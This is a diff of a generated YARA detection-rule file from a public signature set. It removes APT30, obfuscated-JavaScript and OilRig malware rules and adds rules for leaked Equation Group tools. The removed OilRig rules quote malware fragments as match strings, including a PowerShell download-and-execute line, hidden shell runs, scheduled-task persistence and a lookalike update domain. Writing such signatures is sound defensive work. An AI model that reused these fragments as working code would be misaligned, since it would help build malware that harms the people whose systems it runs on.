-		hash0 = "b9aafb575d3d1732cb8fdca5ea226cebf86ea3c9"
-		hash1 = "2c5e347083b77c9ead9e75d41e2fabe096460bba"
-		hash2 = "5d39a567b50c74c4a921b5f65713f78023099933"
+		hash1 = "b220f51ca56d9f9d7d899fa240d3328535f48184d136013fd808d8835919f9ce"
 
 	strings:
-		$s0 = "GetStar" fullword
-		$s1 = ".rdUaS" fullword
-		$s2 = "%sOTwp/&A\\L" fullword
-		$s3 = "a Encrt% Flash Disk" fullword
-		$s4 = "ypeAutoRuChec" fullword
-		$s5 = "NoDriveT" fullword
+		$x1 = "Error in conversion. SlDecoder.exe <input filename> <output filename> at command line " fullword wide
+		$x2 = "KeyLogger_Data" fullword wide
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_7 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Windows_Implant : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "bba40092-267b-5231-92f1-f222c9f888ee"
-		date = "2015-04-13"
+		id = "a82aac49-8843-5420-8b87-f3d7431bc63f"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L1188-L1206"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3216-L3229"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b5a272cbeb46be9b120acdbe12d795eddc05765777e4157d818c2b91ea7b782b"
+		logic_hash = "5b6b349c98a328b4bbdd6d8718af8477c36ec219bb0076dd56998395d0ef5f32"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "2415f661046fdbe3eea8cd276b6f13354019b1a6"
-		hash1 = "e814914079af78d9f1b71000fee3c29d31d9b586"
-		hash2 = "0263de239ccef669c47399856d481e3361408e90"
+		hash1 = "d38ce396926e45781daecd18670316defe3caf975a3062470a87c1d181a61374"
 
 	strings:
-		$s1 = "Xjapor_*ata" fullword
-		$s2 = "Xjapor_o*ata" fullword
-		$s4 = "Ouopai" fullword
+		$s2 = "0#0)0/050;0M0Y0h0|0" fullword ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 50KB and all of them )
 }
-rule SIGNATURE_BASE_APT30_Generic_8 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Msgkd_Msslu64_Msgki_Mssld : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a6845222-0a3e-5327-a448-36e8d54362a5"
-		date = "2015-04-13"
+		id = "cb6d4098-8ede-58ba-9851-7c8b360fb606"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L1207-L1232"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3231-L3256"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2c240d2a35ce3d621d108d03d4e720ddf86e248047fb4dd7f9724e64020caa7f"
+		logic_hash = "f61ce58356ffca197d4a2a4aae43414bcb8f2f284dbee818124dd450f4b50cb9"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "b47e20ac5889700438dc241f28f4e224070810d2"
-		hash1 = "a9a50673ac000a313f3ddba55d63d9773b9f4143"
-		hash2 = "ac96d7f5957aef09bd983465c497de24c6d17a92"
+		hash1 = "9ab667b7b5b9adf4ff1d6db6f804824a22c7cc003eb4208d5b2f12809f5e69d0"
+		hash2 = "320144a7842500a5b69ec16f81a9d1d4c8172bb92301afd07fb79bc0eca81557"
+		hash3 = "c10f4b9abee0fde50fe7c21b9948a2532744a53bb4c578630a81d2911f6105a3"
+		hash4 = "551174b9791fc5c1c6e379dac6110d0aba7277b450c2563e34581565609bc88e"
+		hash5 = "8419866c9058d738ebc1a18567fef52a3f12c47270f2e003b3e1242d86d62a46"
 
 	strings:
-		$s0 = "Windows NT4.0" fullword
-		$s1 = "Windows NT3.51" fullword
-		$s2 = "%d;%d;%d;%ld;%ld;%ld;" fullword
-		$s3 = "%s %d.%d Build%d %s" fullword
-		$s4 = "MSAFD Tcpip [TCP/IP]" fullword
-		$s5 = "SQSRSS" fullword
-		$s8 = "WM_COMP" fullword
-		$s9 = "WM_MBU" fullword
-		$s11 = "WM_GRID" fullword
-		$s12 = "WM_RBU" fullword
+		$s1 = "PQRAPAQSTUVWARASATAUAVAW" fullword ascii
+		$s2 = "SQRUWVAWAVAUATASARAQAP" fullword ascii
+		$s3 = "iijymqp" fullword ascii
+		$s4 = "AWAVAUATASARAQI" fullword ascii
+		$s5 = "WARASATAUAVM" fullword ascii
+		$op1 = { 0c 80 30 02 48 83 c2 01 49 83 e9 01 75 e1 c3 cc }
+		$op2 = { e8 10 66 0d 00 80 66 31 02 48 83 c2 02 49 83 e9 }
+		$op3 = { 48 b8 53 a5 e1 41 d4 f1 07 00 48 33 }
 
 	condition:
-		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and 2 of ( $s* ) or all of ( $op* ) )
 }
-rule SIGNATURE_BASE_APT30_Generic_9 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setcallback : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "cf259f8d-e0a9-579d-93e7-ec14d99faf81"
-		date = "2015-04-13"
+		id = "3c06fc74-2e75-5348-bb62-30c724de1414"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt30_backspace.yar#L1234-L1255"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3258-L3272"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0b30c2f0bd654371bf3ac4f9d4e700e1544b62a6c0a072d506160c443fc5fe9d"
+		logic_hash = "63a17dd56874085753cae92f70d6248ceaac6eaea99fda0d3a551e4988a73895"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash0 = "00d9949832dc3533592c2ce06a403ef19deddce9"
-		hash1 = "27a2b981d4c0bb8c3628bfe990db4619ddfdff74"
-		hash2 = "05f66492c163ec2a24c6a87c7a43028c5f632437"
-		hash3 = "263f094da3f64e72ef8dc3d02be4fb33de1fdb96"
+		hash1 = "a8854f6b01d0e49beeb2d09e9781a6837a0d18129380c6e1b1629bc7c13fdea2"
 
 	strings:
-		$s0 = "%s\\%s\\$NtRecDoc$" fullword
-		$s1 = "%s(%u)%s" fullword
-		$s2 = "http://%s%s%s" fullword
-		$s3 = "1.9.1.17" fullword wide
-		$s4 = "(C)Firefox and Mozilla Developers, according to the MPL 1.1/GPL 2.0/LGPL" wide
+		$s2 = "*NOTE: This version of SetCallback does not work with PeddleCheap versions prior" fullword ascii
+		$s3 = "USAGE: SetCallback <input file> <output file>" fullword ascii
 
 	condition:
-		filesize < 250KB and uint16( 0 ) == 0x5A4D and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_SUSP_Obfuscated_JS_Obfuscatorio : HIGHVOL FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Doublefeaturereader_Doublefeaturereader_0 : FILE
 {
 	meta:
-		description = "Detects JS obfuscation done by the js obfuscator (often malicious)"
-		author = "@imp0rtp3"
-		id = "d808f96c-21c9-59c7-b3c7-f118d39d564e"
-		date = "2021-08-25"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "f662c961-80be-5453-86b1-c4d40ac5b732"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://obfuscator.io"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_susp_js_obfuscatorio.yar#L1-L39"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3274-L3293"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "813df8459e4a53a084dc1f902713af74747a0c2f4ef535e682de38acba9b0e5e"
-		score = 50
-		quality = 60
-		tags = "HIGHVOL, FILE"
+		logic_hash = "9049e1fe31917ecc27e57afecd5845afcd966aac83d386b7c0995c1e3378a0d0"
+		score = 75
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "052e778c26120c683ee2d9f93677d9217e9d6c61ffc0ab19202314ab865e3927"
+		hash2 = "5db457e7c7dba80383b1df0c86e94dc6859d45e1d188c576f2ba5edee139d9ae"
 
 	strings:
-		$a1 = "var a0_0x"
-		$c1 = "))),function(){try{var _0x"
-		$c2 = "=Function('return\\x20(function()\\x20'+'{}.constructor(\\x22return\\x20this\\x22)(\\x20)'+');');"
-		$c3 = "['atob']=function("
-		$c4 = ")['replace'](/=+$/,'');var"
-		$c5 = "return!![]"
-		$c6 = "'{}.constructor(\\x22return\\\x20this\\x22)(\\x20)'"
-		$c7 = "{}.constructor(\x22return\x20this\x22)(\x20)" base64
-		$c8 = "while(!![])"
-		$c9 = "while (!![])"
-		$d1 = /(parseInt\(_0x([a-f0-9]{2}){2,4}\(0x[a-f0-9]{1,5}\)\)\/0x[a-f0-9]{1,2}\)?(\+|\*\()\-?){6}/
+		$x1 = "DFReader.exe logfile AESKey [-j] [-o outputfilename]" fullword ascii
+		$x2 = "Double Feature Target Version" fullword ascii
+		$x3 = "DoubleFeature Process ID" fullword ascii
+		$op1 = { a1 30 21 41 00 89 85 d8 fc ff ff a1 34 21 41 00 }
 
 	condition:
-		$a1 at 0 or ( filesize < 1000000 and ( 3 of ( $c* ) or $d1 ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Gen1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Vtuner_Vtuner_1 : FILE
 {
 	meta:
-		description = "Detects malware from OilRig Campaign"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d291edf1-b086-5c61-b131-61c9f6e1267b"
-		date = "2016-10-12"
+		id = "3794f30b-39dc-59eb-9fd3-4c7837bfd47d"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/QMRZ8K"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L12-L67"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3295-L3315"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "17dbf53ba6e27b230e3357963162a1805c6460cdadce8bba68953a97f699e1b7"
+		logic_hash = "8c161b36599b11264c31c54b94d6bdba53b3f13d27861ededc9f03bba394b775"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34"
-		hash2 = "80161dad1603b9a7c4a92a07b5c8bce214cf7a3df897b561732f9df7920ecb3e"
-		hash3 = "662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f"
-		hash4 = "903b6d948c16dc92b69fe1de76cf64ab8377893770bf47c29bf91f3fd987f996"
-		hash5 = "c4fbc723981fc94884f0f493cb8711fdc9da698980081d9b7c139fcffbe723da"
-		hash6 = "57efb7596e6d9fd019b4dc4587ba33a40ab0ca09e14281d85716a253c5612ef4"
-		hash7 = "1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1"
-		hash8 = "9f31a1908afb23a1029c079ee9ba8bdf0f4c815addbe8eac85b4163e02b5e777"
-		hash9 = "0cd9857a3f626f8e0c07495a4799c59d502c4f3970642a76882e3ed68b790f8e"
-		hash10 = "4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281"
-		hash11 = "4e5b85ea68bf8f2306b6b931810ae38c8dff3679d78da1af2c91032c36380353"
-		hash12 = "c3c17383f43184a29f49f166a92453a34be18e51935ddbf09576a60441440e51"
-		hash13 = "f3856c7af3c9f84101f41a82e36fc81dfc18a8e9b424a3658b6ba7e3c99f54f2"
-		hash14 = "0c64ab9b0c122b1903e8063e3c2c357cbbee99de07dc535e6c830a0472a71f39"
-		hash15 = "d874f513a032ccb6a5e4f0cd55862b024ea0bee4de94ccf950b3dd894066065d"
-		hash16 = "8ee628d46b8af20c4ba70a2fe8e2d4edca1980583171b71fe72455c6a52d15a9"
-		hash17 = "55d0e12439b20dadb5868766a5200cbbe1a06053bf9e229cf6a852bfcf57d579"
-		hash18 = "528d432952ef879496542bc62a5a4b6eee788f60f220426bd7f933fa2c58dc6b"
-		hash19 = "93940b5e764f2f4a2d893bebef4bf1f7d63c4db856877020a5852a6647cb04a0"
-		hash20 = "e2ec7fa60e654f5861e09bbe59d14d0973bd5727b83a2a03f1cecf1466dd87aa"
-		hash21 = "9c0a33a5dc62933f17506f20e0258f877947bdcd15b091a597eac05d299b7471"
-		hash22 = "a787c0e42608f9a69f718f6dca5556607be45ec77d17b07eb9ea1e0f7bb2e064"
-		hash23 = "3772d473a2fe950959e1fd56c9a44ec48928f92522246f75f4b8cb134f4713ff"
-		hash24 = "3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4"
-		hash25 = "f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e"
+		super_rule = 1
+		hash1 = "3e6bec0679c1d8800b181f3228669704adb2e9cbf24679f4a1958e4cdd0e1431"
+		hash2 = "b0d2ebf455092f9d1f8e2997237b292856e9abbccfbbebe5d06b382257942e0e"
 
 	strings:
-		$x1 = "Get-Content $env:Public\\Libraries\\update.vbs) -replace" ascii
-		$x2 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {waitfor haha /T 2}\" & Chr(34), 0" fullword ascii
-		$x3 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" fullword ascii
-		$s4 = "CreateObject(\"WScript.Shell\").Run cmd, 0o" fullword ascii
-		$b1 = "JGdsb2JhbDpteWhvc3QgP" ascii
-		$b2 = "SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzX" ascii
-		$b3 = "U2V0IHdzcyA9IENyZWF0ZU9iamVjdCgid1NjcmlwdC5TaGV" ascii
-		$b4 = "JHNjcmlwdGRpciA9IFNwbGl0LVBhdGggLVBhcmVudCAtUGF0aCA" ascii
-		$b5 = "DQpTZXQgd3NzID0gQ3JlYXRlT2JqZWN" ascii
-		$b6 = "d2hvYW1pICYgaG9zdG5hb" ascii
+		$s1 = "Unable to get -w hash.  %x" fullword wide
+		$s2 = "!\"invalid instruction mnemonic constant Id3vil\"" fullword wide
+		$s4 = "Unable to set -w provider. %x" fullword wide
+		$op0 = { 2b c7 50 e8 3a 8c ff ff ff b6 c0 }
+		$op2 = { a1 8c 62 47 00 81 65 e0 ff ff ff 7f 03 d8 8b c1 }
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 700KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and 2 of them )
 }
-rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Mal1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Ecwi_ESKE_EVFR_RPC2_2 : FILE
 {
 	meta:
-		description = "Detects malware from OilRig Campaign"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c577f0ff-1a33-5d7f-93b2-27df8d414bce"
-		date = "2016-10-12"
+		id = "6c653b0a-fda4-51d6-bf90-bd637547fe47"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/QMRZ8K"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L69-L86"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3317-L3336"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b5fc4329bb639765890c49907860883b96d278381b83307c906f624e6645dedd"
+		logic_hash = "73522034c6588fee090eff87602568371562bdbcbe781ee6e152f3b854514690"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e17e1978563dc10b73fd54e7727cbbe95cc0b170a4e7bd0ab223e059f6c25fcc"
+		super_rule = 1
+		hash1 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd"
+		hash2 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash3 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+		hash4 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
 
 	strings:
-		$x1 = "DownloadExecute=\"powershell \"\"&{$r=Get-Random;$wc=(new-object System.Net.WebClient);$wc.DownloadFile(" ascii
-		$x2 = "-ExecutionPolicy Bypass -File \"&HOME&\"dns.ps1\"" fullword ascii
-		$x3 = "CreateObject(\"WScript.Shell\").Run Replace(DownloadExecute,\"-_\",\"bat\")" fullword ascii
-		$x4 = "CreateObject(\"WScript.Shell\").Run DnsCmd,0" fullword ascii
-		$s1 = "http://winodwsupdates.me" ascii
+		$s1 = "Target is share name" fullword ascii
+		$s2 = "Could not make UdpNetbios header -- bailing" fullword ascii
+		$s3 = "Request non-NT session key" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x4f48 and filesize < 4KB and 1 of them ) or ( 2 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Gen2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__EAFU_Ecwi_ESKE_EVFR_RPC2_4 : FILE
 {
 	meta:
-		description = "Detects Oilrig malware samples"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2ca0aadf-c5a8-5c89-ab1e-0c06d2ab8516"
-		date = "2016-10-12"
-		modified = "2023-01-07"
-		reference = "https://goo.gl/QMRZ8K"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L88-L110"
+		id = "9dc9ed95-5233-56e1-b8f1-4f27f43e7e43"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3338-L3361"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "861ae1696aaa89c81d04214e67d77d98ae85bd7f64ae2979fbe932dc696fd32c"
+		logic_hash = "ed6e0e4e5a0849aad64bbc47c047f3fe388052d0ebe89de0257d4422fb39be21"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "c6437f57a8f290b5ec46b0933bfa8a328b0cb2c0c7fbeea7f21b770ce0250d3d"
-		hash2 = "293522e83aeebf185e653ac279bba202024cedb07abc94683930b74df51ce5cb"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "3e181ca31f1f75a6244b8e72afaa630171f182fbe907df4f8b656cc4a31602f6"
+		hash2 = "c4152f65e45ff327dade50f1ac3d3b876572a66c1ce03014f2877cea715d9afd"
+		hash3 = "9d16d97a6c964e0658b6cd494b0bbf70674bf37578e2ff32c4779a7936e40556"
+		hash4 = "c5e119ff7b47333f415aea1d2a43cb6cb322f8518562cfb9b90399cac95ac674"
+		hash5 = "5c0896dbafc5d8cc19b1bc7924420b20ed5999ac5bee2cb5a91aada0ea01e337"
 
 	strings:
-		$s1 = "%userprofile%\\AppData\\Local\\Microsoft\\" ascii
-		$s2 = "$fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('" fullword ascii
-		$s3 = "&{$rn = Get-Random; $id = 'TR" fullword ascii
-		$s4 = "') -replace '__',('DNS'+$id) | " fullword ascii
-		$s5 = "\\upd.vbs" ascii
-		$s6 = "schtasks /create /F /sc minute /mo " fullword ascii
-		$s7 = "') -replace '__',('HTP'+$id) | " fullword ascii
-		$s8 = "&{$rn = Get-Random -minimum 1 -maximum 10000; $id = 'AZ" fullword ascii
-		$s9 = "http://www.israirairlines.com/?mode=page&page=14635&lang=eng<" fullword ascii
+		$x1 = "* Listening Post DLL %s() returned error code %d." fullword ascii
+		$s1 = "WsaErrorTooManyProcesses" fullword ascii
+		$s2 = "NtErrorMoreProcessingRequired" fullword ascii
+		$s3 = "Connection closed by remote host (TCP Ack/Fin)" fullword ascii
+		$s4 = "ServerErrorBadNamePassword" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 4000KB and 2 of ( $s* ) ) or ( 4 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of ( $s* ) or 1 of ( $x* ) )
 }
-rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Gen3 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Sendcftrigger_Sendpktrigger_6 : FILE
 {
 	meta:
-		description = "Detects Oilrig malware samples"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1cd5f7ea-4ae6-5642-b8b3-050cfe724e69"
-		date = "2016-10-12"
-		modified = "2023-01-07"
-		reference = "https://goo.gl/QMRZ8K"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L112-L129"
+		id = "658d6f7d-2164-5e43-b5a5-d9bea9cd2e27"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3363-L3379"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ccc110b04ea3ee9a19ff23babbc759b4ec6114f8b5eb4f42bc5f70f8abde8a53"
+		logic_hash = "4fb290bdf15e0701b6d543e1f978011046abe23e58c790ee1b992a5e0443a271"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "5e9ddb25bde3719c392d08c13a295db418d7accd25d82d020b425052e7ba6dc9"
-		hash2 = "bd0920c8836541f58e0778b4b64527e5a5f2084405f73ee33110f7bc189da7a9"
-		hash3 = "90639c7423a329e304087428a01662cc06e2e9153299e37b1b1c90f6d0a195ed"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash1 = "3bee31b9edca8aa010a4684c2806b0ca988b2bcc14ad0964fec4f11f3f6fb748"
+		hash2 = "2f9c7a857948795873a61f4d4f08e1bd0a41e3d6ffde212db389365488fa6e26"
 
 	strings:
-		$x1 = "source code from https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.htmlrrrr" fullword ascii
-		$x2 = "\\Libraries\\fireueye.vbs" ascii
-		$x3 = "\\Libraries\\fireeye.vbs&" wide
+		$s4 = "* Failed to connect to destination - %u" fullword wide
+		$s6 = "* Failed to convert destination address into sockaddr_storage values" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 100KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them )
 }
-rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Mal2 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__Addresource : FILE
 {
 	meta:
-		description = "Detects malware from OilRig Campaign"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7a6c38e7-bed9-524b-b4a5-c6c895b9c049"
-		date = "2016-10-12"
+		id = "cbba38fa-a906-5463-ae46-2b9c9f1bf8e0"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/QMRZ8K"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L131-L149"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L3381-L3398"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b1de7dc3c205c78825f52ea30608b10bafa2c486db53693aa90aa07138fb1a87"
+		logic_hash = "e59863ac7f1147cdbc34cbd2b09183487999d9f01974279c7ccc0c5af7a99976"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "65920eaea00764a245acb58a3565941477b78a7bcc9efaec5bf811573084b6cf"
+		super_rule = 1
+		hash1 = "e83e4648875d4c4aa8bc6f3c150c12bad45d066e2116087cdf78a4a4efbab6f0"
+		hash2 = "5a04d65a61ef04f5a1cbc29398c767eada367459dc09c54c3f4e35015c71ccff"
 
 	strings:
-		$x1 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {(Get-Content $env:Public\\Libraries\\update.vbs) -replace '__',(Get-Random) | Set-C" ascii
-		$x2 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" fullword ascii
-		$x3 = "mailto:Mohammed.sarah@gratner.com" fullword wide
-		$x4 = "mailto:Tarik.Imam@gartner.com" fullword wide
-		$x5 = "Call Extract(DnsPs1, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\dns.ps1\")" fullword ascii
-		$x6 = "2dy53My5vcmcvMjAw" fullword wide
+		$s1 = "%s cm 10 2000 \"c:\\MY DIR\\myapp.exe\" c:\\MyResourceData.dat" fullword ascii
+		$s2 = "<PE path> - the path to the PE binary to which to add the resource." fullword ascii
+		$s3 = "Unable to get path for target binary." fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0xcfd0 and filesize < 200KB and 1 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 2 of them )
 }
-rule SIGNATURE_BASE_Oilrig_Campaign_Reconnaissance : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17__ESKE_RPC2_8 : FILE
 {
 	meta:
-		description = "Detects Windows discovery commands - known from OilRig Campaign"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
